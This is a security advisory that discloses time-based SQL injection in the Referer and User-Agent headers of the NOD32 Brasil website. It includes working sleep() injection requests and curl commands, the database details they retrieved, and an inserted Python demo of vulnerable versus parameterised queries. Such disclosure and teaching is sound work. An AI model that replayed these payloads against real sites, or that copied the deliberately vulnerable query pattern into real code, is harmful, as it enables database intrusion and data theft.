2017-007: The domain www.nod32.com.br from Nod32 Brasil is vulnerable to Time Based SQL

Original release date: July 26, 2017
Last revised: July 26, 2017
Severity: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

BACKGROUND

ESET is an IT security company that offers anti-virus and firewall products such as ESET NOD32.

DESCRIPTION

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
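The mechanism described above, where untrusted input is spliced into the query text, is shown here with an added example that is not part of the advisory or of ESET's code. It assumes a hypothetical visit-logging routine that stores the User-Agent and Referer headers (the two headers the proof of concept below targets) and uses an in-memory SQLite database so it runs offline; the header values are constructed for the example, and the vulnerable variant is kept vulnerable on purpose so the contrast with the parameterised variant is visible.

```python
import sqlite3

# Constructed header values for the example (not taken from the advisory's requests).
BENIGN_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/55.0"
QUOTED_UA = "O'Reilly-Bot/1.0"  # a legitimate value that happens to contain an apostrophe
INJECTED_UA = "Mozilla/5.0', (SELECT sqlite_version())) -- "  # constructed: closes the literal, injects a subquery
REFERER = "http://www.example.test/page"


def new_db():
    """Fresh in-memory database with the table the hypothetical visit logger writes to."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (ua TEXT, referer TEXT)")
    return conn


def log_visit_vulnerable(conn, ua, referer):
    """Deliberately vulnerable: header text is concatenated into the SQL statement,
    so a quote in the header is parsed as SQL syntax rather than stored as data."""
    sql = "INSERT INTO visits (ua, referer) VALUES ('%s', '%s')" % (ua, referer)
    conn.execute(sql)


def log_visit_safe(conn, ua, referer):
    """Hardened: bound parameters keep header text in the data plane. The DBMS never
    parses it, so quotes, comments and subqueries are stored verbatim."""
    conn.execute("INSERT INTO visits (ua, referer) VALUES (?, ?)", (ua, referer))


def run_comparison(ua, referer):
    """Run both implementations on the same headers and return what each one stored,
    or ("error", message) when the statement failed to parse."""
    outcome = {}
    for name, fn in (("vulnerable", log_visit_vulnerable), ("safe", log_visit_safe)):
        conn = new_db()
        try:
            fn(conn, ua, referer)
            outcome[name] = conn.execute("SELECT ua, referer FROM visits").fetchone()
        except sqlite3.OperationalError as exc:
            outcome[name] = ("error", str(exc))
        finally:
            conn.close()
    return outcome


if __name__ == "__main__":
    for ua in (BENIGN_UA, QUOTED_UA, INJECTED_UA):
        print(repr(ua))
        for impl, stored in run_comparison(ua, REFERER).items():
            print("  %-10s -> %r" % (impl, stored))
```

The apostrophe in a harmless User-Agent already makes the concatenated statement fail to parse, which is the same signal an attacker uses to find the flaw; the constructed subquery then shows the injected SQL being evaluated by the engine and its result landing in the referer column. The parameterised version stores every value exactly as received in all three cases.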

PROOF OF CONCEPT

-------------------------
Vulnerable URL:             http://www.nod32.com.br
Vulnerable HTTP headers:    Referer and User-Agent

### Request (User-Agent)
 
GET /kb/SOLN2522 HTTP/1.1
Host: www.nod32.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0'+(SELECT*FROM(SELECT(sleep(20)))a)+++'
Connection: close
Referer: http://www.nod32.com.br/hogar/cybersecurity-pro-mac
Cookie: PHPSESSID=47f1dadd26c823d0a7be9215d2befb97

### Request (Referer)
 
GET /kb/SOLN2522 HTTP/1.1
Host: www.nod32.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Connection: close
Referer: http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++'
Cookie: PHPSESSID=47f1dadd26c823d0a7be9215d2befb97

### Proof of Concept
For the proof of concept, the following data was retrieved from the affected database:

HostName: 798348-db2.eset.com
DBMS: MySQL 5.6.31
DB User: esetla_otros@192.168.103.108
Current DB: esetla_otros
DBA Privileges: False
Databases: esetla_pol, esetsa_uyrps, infproayoon_schema

### Multiple Time Based SQL Injection

$ time curl -e \
  "http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(20)))a)+++'" \
  "http://www.nod32.com.br/kb/SOLN2522"
real    0m20,403s
user    0m0,008s
sys     0m0,004s

$ time curl -e \
  "http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(10)))a)+++'" \
  "http://www.nod32.com.br/kb/SOLN2522"
real    0m10,320s
user    0m0,004s
sys     0m0,008s

$ time curl -e \
  "http://www.nod32.com.br/hogar/cybersecurity-pro-mac'+++++++(SELECT*FROM(SELECT(sleep(5)))a)+++'" \
  "http://www.nod32.com.br/kb/SOLN2522"
real    0m5,318s
user    0m0,008s
sys     0m0,004s

BUSINESS IMPACT

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

SYSTEMS AFFECTED

SOLUTION

Contact vendor for a fix.

REVISION HISTORY

July 26, 2017 : Initial release

DISCLOSURE TIMELINE

  • July 26, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • July 26, 2017 : Contact with ESET Security Team.

REFERENCES

Consult these external references for further information:

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain- and Colombia-based company and a leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects, whitepapers, presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.